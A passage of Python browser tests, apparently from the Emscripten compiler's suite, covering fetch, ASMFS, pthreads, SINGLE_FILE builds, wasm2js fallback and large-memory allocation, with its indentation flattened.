# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(path_from_root('tests', 'unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(path_from_root('tests', 'unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(path_from_root('tests', 'unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_test_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.compile_btest([path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
create_test_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure', '1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
self.btest(path_from_root('tests', 'small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest_exit(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(path_from_root('tests', 'system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(path_from_root('tests', 'mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-s', 'MALLOC=emmalloc', '-s', 'ABORTING_MALLOC=0', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'MAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest(path_from_root('tests', 'alloc_3gb.cpp'),
expected='0',
args=['-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ALLOW_MEMORY_GROWTH=1'] + args)
test(['-s', 'MALLOC=emmalloc'])
test(['-s', 'MALLOC=emmalloc-debug'])
test(['-s', 'MALLOC=emmalloc-memvalidate'])
test(['-s', 'MALLOC=emmalloc-memvalidate-verbose'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_emrun(self):
self.run_process([EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
